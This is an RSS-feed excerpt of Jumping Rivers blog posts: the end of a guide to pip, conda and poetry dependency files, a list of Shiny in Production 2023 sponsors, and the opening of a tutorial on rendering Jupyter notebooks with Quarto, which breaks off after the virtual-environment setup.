&lt;p&gt;In pip, a &lt;code&gt;requirements.txt&lt;/code&gt; file is used to store package versions (the file could be given any name, but &lt;code&gt;requirements.txt&lt;/code&gt; is the convention). In conda, a YAML file is used instead, typically named &lt;code&gt;environment.yml&lt;/code&gt;. YAML (which stands for YAML Ain&amp;rsquo;t Markup Language) is a human-readable format that is often used for configuration files. Within conda, the YAML file stores the information needed to recreate your conda environment, including the packages for the project you are working on and the version of Python being used (conda can also manage other languages). To create an &lt;code&gt;environment.yml&lt;/code&gt; file, run the following command from within the activated environment.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;conda env export &amp;gt; environment.yml
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This will produce an &lt;code&gt;environment.yml&lt;/code&gt; file which will be similar to the example below.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-yaml" data-lang="yaml"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#7ee787"&gt;name&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;lt;environment_name&amp;gt;&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;&lt;/span&gt;&lt;span style="color:#7ee787"&gt;channels&lt;/span&gt;:&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;- &lt;span style="color:#a5d6ff"&gt;defaults&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;&lt;/span&gt;&lt;span style="color:#7ee787"&gt;dependencies&lt;/span&gt;:&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;- &lt;span style="color:#a5d6ff"&gt;flake8=4.0.1&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;- &lt;span style="color:#a5d6ff"&gt;numpy=1.25.2&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;- &lt;span style="color:#a5d6ff"&gt;pandas=2.1.0&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;- &lt;span style="color:#a5d6ff"&gt;python=3.10.8&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;- &lt;span style="color:#a5d6ff"&gt;scikit-learn=1.3.0&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;code&gt;conda env export&lt;/code&gt; is similar to &lt;code&gt;pip freeze&lt;/code&gt;: it exports every package in your environment along with its version. The difference is that the output is structured as YAML rather than as a plain list. As with pip, we use the &lt;code&gt;&amp;gt;&lt;/code&gt; operator to write the output of &lt;code&gt;conda env export&lt;/code&gt; into &lt;code&gt;environment.yml&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;To install all the packages and their dependencies with the specific versions from an &lt;code&gt;environment.yml&lt;/code&gt; file use the following command.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;conda env create -f environment.yml
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This will create a new conda environment with all the packages and versions specified in &lt;code&gt;environment.yml&lt;/code&gt;. We will talk more about Python environments and their uses in an upcoming blog.&lt;/p&gt;
&lt;h4 id="poetry-1"&gt;poetry&lt;/h4&gt;
&lt;p&gt;By default, when you create a new poetry project (using &lt;code&gt;poetry new &amp;lt;PROJECT-NAME&amp;gt;&lt;/code&gt;)
a &lt;code&gt;pyproject.toml&lt;/code&gt; file will be generated. Once you have added packages to your
poetry project, your &lt;code&gt;pyproject.toml&lt;/code&gt; file will look similar to the example
below:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-toml" data-lang="toml"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;[tool.poetry]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;name = &lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;lt;environment_name&amp;gt;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;version = &lt;span style="color:#a5d6ff"&gt;&amp;#34;0.1.0&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;description = &lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;authors = [&lt;span style="color:#a5d6ff"&gt;&amp;#34;Jane Doe &amp;lt;jane.doe@123evergreenterrace.com&amp;gt;&amp;#34;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;[tool.poetry.dependencies]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;python = &lt;span style="color:#a5d6ff"&gt;&amp;#34;^3.10&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;numpy = &lt;span style="color:#a5d6ff"&gt;&amp;#34;^1.25.2&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pandas = &lt;span style="color:#a5d6ff"&gt;&amp;#34;^2.1.0&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;[build-system]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;requires = [&lt;span style="color:#a5d6ff"&gt;&amp;#34;poetry-core&amp;#34;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;build-backend = &lt;span style="color:#a5d6ff"&gt;&amp;#34;poetry.core.masonry.api&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The Python packages you install can be seen under &lt;code&gt;[tool.poetry.dependencies]&lt;/code&gt; along with the Python version. You can add extra requirements to the &lt;code&gt;pyproject.toml&lt;/code&gt; file either by manually editing it or by using &lt;code&gt;poetry add &amp;lt;package&amp;gt;&lt;/code&gt;. If you edit the TOML file manually, note that the caret notation &lt;code&gt;^&lt;/code&gt; allows any later version that does not change the leftmost non-zero part of the version number. For example, &lt;code&gt;python = &amp;quot;^3.10&amp;quot;&lt;/code&gt; accepts Python 3.10 or above but below 4.0, and &lt;code&gt;numpy = &amp;quot;^1.25.2&amp;quot;&lt;/code&gt; accepts versions from 1.25.2 up to, but not including, 2.0.0.&lt;/p&gt;
&lt;p&gt;When you install dependencies in a poetry project, the exact version numbers of
the installed packages and &lt;em&gt;their&lt;/em&gt; dependencies are added to a &lt;code&gt;poetry.lock&lt;/code&gt;
file located in the same directory. The &lt;code&gt;pyproject.toml&lt;/code&gt; and &lt;code&gt;poetry.lock&lt;/code&gt; files
can then be shared with a colleague, who can install the dependencies by
running the following command in the same directory as the files:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;poetry install
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;To use the dependencies installed by poetry, you need to activate the poetry
&lt;em&gt;environment&lt;/em&gt; by running:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;poetry shell
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;You will now be using the same development environment as any colleagues that
are working on the same project. We will learn more about poetry and other
virtual environments in an upcoming blog.&lt;/p&gt;
&lt;p&gt;If instead you have a &lt;code&gt;requirements.txt&lt;/code&gt; file, we can still install the packages and relevant versions using poetry. This can be done as follows:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;poetry add &lt;span style="color:#ff7b72"&gt;$(&lt;/span&gt; cat requirements.txt &lt;span style="color:#ff7b72"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This will add each package and version to the &lt;code&gt;pyproject.toml&lt;/code&gt; file. The command substitution &lt;code&gt;$( cat requirements.txt )&lt;/code&gt; passes the contents of &lt;code&gt;requirements.txt&lt;/code&gt; to &lt;code&gt;poetry add&lt;/code&gt; as a list of arguments, so it works when the file contains only package specifiers, with no comments or pip options.&lt;/p&gt;
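&lt;p&gt;If your &lt;code&gt;requirements.txt&lt;/code&gt; contains comments, blank lines or pip options such as &lt;code&gt;-r&lt;/code&gt;, these need to be filtered out first, because every word in the file is passed to &lt;code&gt;poetry add&lt;/code&gt; as an argument. The following is a minimal sketch rather than a poetry feature: the function name &lt;code&gt;requirement_specs&lt;/code&gt; is made up for this example, and it assumes one requirement per line with no trailing comments.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;# Print only the requirement lines of a file, skipping blank lines,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;# full-line comments and pip options such as &amp;#34;-r other.txt&amp;#34;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;# (requirement_specs is an illustrative helper, not a poetry command)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;requirement_specs() {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;  grep -Ev &amp;#39;^[[:space:]]*(#|-|$)&amp;#39; &amp;#34;$1&amp;#34; || true
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;With the function defined, the packages can be added with &lt;code&gt;poetry add $( requirement_specs requirements.txt )&lt;/code&gt;.&lt;/p&gt;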
&lt;h3 id="conclusion"&gt;Conclusion&lt;/h3&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th style="text-align: left"&gt;Package manager&lt;/th&gt;
&lt;th style="text-align: center"&gt;Easy to install&lt;/th&gt;
&lt;th style="text-align: center"&gt;Online support&lt;/th&gt;
&lt;th style="text-align: center"&gt;Latest packages always available&lt;/th&gt;
&lt;th style="text-align: center"&gt;Virtual environment manager&lt;/th&gt;
&lt;th style="text-align: center"&gt;Handles package dependencies&lt;/th&gt;
&lt;th style="text-align: center"&gt;Small installation size&lt;/th&gt;
&lt;th style="text-align: center"&gt;Multi-platform&lt;/th&gt;
&lt;th style="text-align: center"&gt;Access to PyPI&lt;/th&gt;
&lt;th style="text-align: center"&gt;Easy Python package publishing&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="text-align: left"&gt;pip&lt;/td&gt;
&lt;td style="text-align: center"&gt;✅&lt;/td&gt;
&lt;td style="text-align: center"&gt;✅&lt;/td&gt;
&lt;td style="text-align: center"&gt;✅&lt;/td&gt;
&lt;td style="text-align: center"&gt;❌&lt;/td&gt;
&lt;td style="text-align: center"&gt;❌&lt;/td&gt;
&lt;td style="text-align: center"&gt;✅&lt;/td&gt;
&lt;td style="text-align: center"&gt;❌&lt;/td&gt;
&lt;td style="text-align: center"&gt;✅&lt;/td&gt;
&lt;td style="text-align: center"&gt;❌&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="text-align: left"&gt;conda&lt;/td&gt;
&lt;td style="text-align: center"&gt;✅&lt;/td&gt;
&lt;td style="text-align: center"&gt;✅&lt;/td&gt;
&lt;td style="text-align: center"&gt;❌&lt;/td&gt;
&lt;td style="text-align: center"&gt;✅&lt;/td&gt;
&lt;td style="text-align: center"&gt;✅&lt;/td&gt;
&lt;td style="text-align: center"&gt;❌&lt;/td&gt;
&lt;td style="text-align: center"&gt;✅&lt;/td&gt;
&lt;td style="text-align: center"&gt;✅*&lt;/td&gt;
&lt;td style="text-align: center"&gt;❌&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="text-align: left"&gt;poetry&lt;/td&gt;
&lt;td style="text-align: center"&gt;❌&lt;/td&gt;
&lt;td style="text-align: center"&gt;✅&lt;/td&gt;
&lt;td style="text-align: center"&gt;✅&lt;/td&gt;
&lt;td style="text-align: center"&gt;✅&lt;/td&gt;
&lt;td style="text-align: center"&gt;✅&lt;/td&gt;
&lt;td style="text-align: center"&gt;✅&lt;/td&gt;
&lt;td style="text-align: center"&gt;❌&lt;/td&gt;
&lt;td style="text-align: center"&gt;✅&lt;/td&gt;
&lt;td style="text-align: center"&gt;✅&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;div style="text-align: right"&gt; *by using pip &lt;/div&gt;
&lt;p&gt;Installing a Python package manager is a straightforward process that varies slightly with your operating system. Whether you&amp;rsquo;re using Windows, macOS or Linux, setting up these tools is a small investment that pays off in significantly improved project management and development practices. The table above summarises some pros and cons of each package manager we have covered. I would not recommend installing all three package managers at once, as it can become confusing to remember which packages you installed with which manager. Instead, choose whichever you like the look of best and try that one first. Personally, I would recommend pip or conda if this is your first introduction to Python, and poetry if you are working on a collaborative project. Whichever you choose, pick the package manager that best suits your needs and enjoy the benefits of efficient dependency management and streamlined development workflows.&lt;/p&gt;
&lt;script&gt;
// Show the tab content for the selected operating system and mark its button as active
function openOS(evt, OSName) {
var i, tabcontent, tablinks;
tabcontent = document.getElementsByClassName("tabcontent");
for (i = 0; i &lt; tabcontent.length; i++) {
tabcontent[i].style.display = "none";
}
tablinks = document.getElementsByClassName("tablinks");
for (i = 0; i &lt; tablinks.length; i++) {
tablinks[i].className = tablinks[i].className.replace(" active", "");
}
document.getElementById(OSName).style.display = "block";
evt.currentTarget.className += " active";
}
&lt;/script&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/python-package-managers-pip-conda-poetry/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Shiny in Production: Sponsors</title><link>https://www.jumpingrivers.com/blog/shiny-in-production-2023-sponsors/</link><pubDate>Thu, 28 Sep 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/shiny-in-production-2023-sponsors/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/shiny-in-production-2023-sponsors/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/shiny-in-production-2023-sponsors/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;There are only two weeks left to go until Shiny in Production 2023! The events team are hard at work getting things ready for the day, and we wanted to take this opportunity to say a huge thank you to our event sponsors!&lt;/p&gt;
&lt;h3 id="gold-sponsor"&gt;Gold Sponsor&lt;/h3&gt;
&lt;h4 id="national-innovation-centre-for-data"&gt;National Innovation Centre for Data&lt;/h4&gt;
&lt;p&gt;The &lt;a href="https://www.nicd.org.uk/" rel="external"&gt;National Innovation Centre for Data&lt;/a&gt; (NICD) was created in 2019 with £30 million of funding from the government and Newcastle University. Based in the state-of-the-art Helix science district in Newcastle, our mission is to transfer data skills to the UK workforce. Our team of PhD-level data scientists work to ensure that organisations across the country are equipped to reap the benefits of the global data-driven revolution.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://www.nicd.org.uk/"&gt;&lt;img src="nicd_logo.png" alt="NICD logo" style="width: 400px; display: block; margin-left: auto; margin-right: auto"/&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you require help building a Shiny app? Would you like someone to take over the maintenance burden?
If so, check out
our
&lt;a href="https://www.jumpingrivers.com/consultancy/shiny-dash-flask-dashboard-consultancy/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-shiny-in-production-sponsors"&gt;Shiny and Dash&lt;/a&gt;
services.
&lt;/p&gt;
&lt;/aside&gt;
&lt;!-- This is where the ad goes! Just use the name of the shortcode file. --&gt;&lt;/p&gt;
&lt;h3 id="silver-sponsors--drinks-reception"&gt;Silver Sponsors + Drinks Reception&lt;/h3&gt;
&lt;h4 id="royal-statistical-society"&gt;Royal Statistical Society&lt;/h4&gt;
&lt;p&gt;Founded in 1834, the &lt;a href="https://rss.org.uk/" rel="external"&gt;Royal Statistical Society&lt;/a&gt; (RSS) are one of the world&amp;rsquo;s leading organisations advocating for the importance of statistics and data. They&amp;rsquo;re a professional body for all statisticians and data analysts &amp;ndash; wherever they may live.&lt;/p&gt;
&lt;p&gt;They have more than 10,000 members in the UK and across the world. As a charity, they advocate for the key role of statistics and data in society, and work to ensure that policy formulation and decision making are informed by evidence for the public good.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://rss.org.uk/"&gt;&lt;img src="rss_logo.png" alt="RSS logo" style="width: 400px; display: block; margin-left: auto; margin-right: auto"/&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h3 id="silver-sponsors"&gt;Silver Sponsors&lt;/h3&gt;
&lt;h4 id="newcastle-university-solve"&gt;Newcastle University Solve&lt;/h4&gt;
&lt;p&gt;&lt;a href="https://www.ncl.ac.uk/maths-physics/engagement/nusolve/" rel="external"&gt;Newcastle University Solve&lt;/a&gt; (NU Solve) has been helping businesses, public sector organisations and industries to find answers to complex challenges for more than three decades. We emerged out of the Industrial Statistics Research Unit, which had successfully engaged with enterprises since 1984.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://www.ncl.ac.uk/maths-physics/engagement/nusolve/"&gt;&lt;img src="nu-solve_logo.png" alt="NU Solve logo" style="width: 400px; display: block; margin-left: auto; margin-right: auto"/&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h4 id="posit"&gt;Posit&lt;/h4&gt;
&lt;p&gt;&lt;a href="https://posit.co/" rel="external"&gt;Posit&lt;/a&gt;&amp;rsquo;s mission is to create open-source software for data science,
scientific research, and technical communication. They do this to
enhance the production and consumption of knowledge by everyone,
regardless of economic means.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://posit.co/"&gt;&lt;img src="posit_logo.png" alt="Posit logo" style="width: 400px; display: block; margin-left: auto; margin-right: auto"/&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h4 id="r-consortium"&gt;R Consortium&lt;/h4&gt;
&lt;p&gt;The central mission of the &lt;a href="https://www.r-consortium.org/" rel="external"&gt;R Consortium&lt;/a&gt; is to work with and provide support to the R Foundation and to the key organizations developing, maintaining, distributing and using R software through the identification, development and implementation of infrastructure projects.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://www.r-consortium.org/"&gt;&lt;img src="rconsortium_logo.png" alt="R Consortium logo" style="width: 400px; display: block; margin-left: auto; margin-right: auto"/&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/shiny-in-production-2023-sponsors/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Reproducible reports with Jupyter</title><link>https://www.jumpingrivers.com/blog/reproducible-reports-jupyter-quarto-python/</link><pubDate>Thu, 21 Sep 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/reproducible-reports-jupyter-quarto-python/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/reproducible-reports-jupyter-quarto-python/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/reproducible-reports-jupyter-quarto-python/graphics/featured-high-res.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Jupyter notebooks are a useful tool for Python users of all levels. They allow
us to mix together plain text (formatted as Markdown) with Python code. This
is beneficial for beginners and experienced data scientists alike:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Beginners that are learning Python for the first time can use Markdown cells
to annotate code and record notes.&lt;/li&gt;
&lt;li&gt;By splitting up their code into chunks, developers can write and test their
code in a modular manner.&lt;/li&gt;
&lt;li&gt;Jupyter notebooks are open-source and a convenient format for developers to
share reports containing live code, equations, visualisations and narrative
text with colleagues.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In this post, we will go deeper with these ideas and show you how to create
reproducible HTML and PDF reports with Jupyter. This blog is a follow-up to
&lt;a href="https://www.jumpingrivers.com/blog/quarto-for-python-users/" rel="external"&gt;Quarto for the Python user&lt;/a&gt;,
which explained how to generate reproducible reports from plain text files with
Quarto.&lt;/p&gt;
&lt;h3 id="what-is-quarto"&gt;What is Quarto?&lt;/h3&gt;
&lt;p&gt;Quarto is free-to-use, open-source software built on Pandoc that enables
users to convert plain text files into a range of formats, including PDF, HTML
and PowerPoint presentations. These documents can contain a mixture of
narrative text, Python code, and figures that are dynamically generated by the
embedded code.&lt;/p&gt;
&lt;p&gt;This has many use-cases:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Your company may have a weekly board meeting to go over the latest sales
figures. By having a Quarto presentation that pulls in the latest company
sales data, you can regenerate the presentation slides each week at the click
of a button.&lt;/li&gt;
&lt;li&gt;As a researcher you may be preparing a report for publication. By having the
code that generates data tables and figures embedded within the report,
regenerating the draft as the experimental data floods in is a breeze!&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In our recent blog post,
&lt;a href="https://www.jumpingrivers.com/blog/quarto-for-python-users/" rel="external"&gt;Quarto for the Python user&lt;/a&gt;,
we used Quarto to render dynamic reports that mix together Python code and
narrative text. We used Quarto&amp;rsquo;s standard workflow, which starts from plain
text &lt;code&gt;.qmd&lt;/code&gt; files. In this post we will extend these ideas to Jupyter
Notebooks.&lt;/p&gt;
&lt;p&gt;Starting with &lt;code&gt;.ipynb&lt;/code&gt; notebook files, the Quarto workflow is:&lt;/p&gt;
&lt;p&gt;&lt;img alt="A flow chart of the Quarto rendering workflow: The ipynb file is first converted to Markdown, with Jupyter used to interpret the code cells. The Markdown file can then be converted to a variety of formats, including HTML, DOCX and PDF, using Pandoc." height="auto" id="h-rh-i-0" src="https://www.jumpingrivers.com/blog/reproducible-reports-jupyter-quarto-python/graphics/quarto-diagram.png" width="960"&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;A Jupyter kernel is used to interpret the Python code cells and Quarto
generates a Markdown document.&lt;/li&gt;
&lt;li&gt;The Markdown document includes the text, code, and any figures or results
that were generated by the code.&lt;/li&gt;
&lt;li&gt;This is then converted into the desired output format (PDF, HTML, etc) using
Pandoc.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="prerequisites"&gt;Prerequisites&lt;/h3&gt;
&lt;p&gt;We will be using &lt;a href="https://code.visualstudio.com/download" rel="external"&gt;VS Code&lt;/a&gt; to edit and
render our Jupyter notebook (the only other IDE with support for both Jupyter
and Quarto is
&lt;a href="https://jupyterlab.readthedocs.io/en/latest/getting_started/overview.html" rel="external"&gt;JupyterLab&lt;/a&gt;).
Before you can work with Jupyter in VS Code, you will need to install the
Jupyter extension. This can be located in VS Code by clicking &amp;ldquo;Settings&amp;rdquo; -&amp;gt;
&amp;ldquo;Extensions&amp;rdquo; then typing &amp;ldquo;jupyter&amp;rdquo; into the extensions search bar. Select the
&amp;ldquo;Jupyter&amp;rdquo; extension by Microsoft and click &amp;ldquo;Install&amp;rdquo;.&lt;/p&gt;
&lt;p&gt;You will also need to &lt;a href="https://quarto.org/docs/get-started/" rel="external"&gt;install Quarto&lt;/a&gt;.
You can then find the Quarto extension in VS Code by typing &amp;ldquo;quarto&amp;rdquo; into the
extensions search bar. Select the &amp;ldquo;Quarto&amp;rdquo; extension and click &amp;ldquo;Install&amp;rdquo;.&lt;/p&gt;
&lt;p&gt;Finally, to reproduce the examples covered in this post, you will need to
install the Python dependencies by running the following command from your
terminal:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;python3 -m pip install ipykernel nbclient nbformat pandas papermill plotly statsmodels
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;These dependencies are required for creating an interactive Plotly figure in
Jupyter and rendering the notebook from the command line.&lt;/p&gt;
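&lt;p&gt;Before moving on, it can be worth confirming that the packages are visible to
the interpreter you plan to use. The following is a minimal sketch using only the
standard library; the helper name &lt;code&gt;missing_packages&lt;/code&gt; is our own and
not part of any of the packages above:&lt;/p&gt;

```python
from importlib.util import find_spec

# Import names of the packages installed by the pip command above.
REQUIRED = [
    "ipykernel", "nbclient", "nbformat", "pandas",
    "papermill", "plotly", "statsmodels",
]


def missing_packages(names):
    """Return the names that cannot be found in the current environment."""
    return [name for name in names if find_spec(name) is None]


missing = missing_packages(REQUIRED)
if missing:
    print("Missing packages:", ", ".join(missing))
else:
    print("All dependencies found.")
```

&lt;p&gt;If any names are reported as missing, re-run the &lt;code&gt;pip&lt;/code&gt; command
with the same Python interpreter that your notebook kernel uses.&lt;/p&gt;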
&lt;h4 id="setting-up-a-virtual-environment"&gt;Setting up a virtual environment&lt;/h4&gt;
&lt;p&gt;In case you&amp;rsquo;d like to follow along with these examples using a virtual
environment, we will provide brief instructions for setting up a kernel on
Jupyter. If you&amp;rsquo;re happy to just use your system Python installation then you
can move onto the next section.&lt;/p&gt;
&lt;p&gt;To create a virtual environment, run the following command from your command
terminal:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;python3 -m venv venv
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;This will create a folder called &amp;ldquo;venv&amp;rdquo; containing the virtual
environment (you can call the folder whatever you like). To activate it on Linux or macOS, run:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;source venv/bin/activate
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Now install the Python dependencies into your environment by running the &lt;code&gt;pip&lt;/code&gt;
command shared above. You can now add this environment to your list of Jupyter
kernels by running:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;ipython kernel install --user --name=venv
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;This will add a kernel called &amp;ldquo;venv&amp;rdquo;. Next time you open a Jupyter notebook,
you should now be able to select this kernel from the list of options.&lt;/p&gt;
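&lt;p&gt;To check that a notebook really is running on the kernel you selected, you
could run something like the sketch below in a code cell. It relies only on the
standard library; the function name &lt;code&gt;in_virtual_environment&lt;/code&gt; is
purely illustrative:&lt;/p&gt;

```python
import sys


def in_virtual_environment():
    """Return True when the interpreter is running inside a venv."""
    # Inside a venv, sys.prefix points at the environment folder while
    # sys.base_prefix still points at the base Python installation.
    return sys.prefix != sys.base_prefix


print("Interpreter:", sys.executable)
print("Inside a virtual environment:", in_virtual_environment())
```

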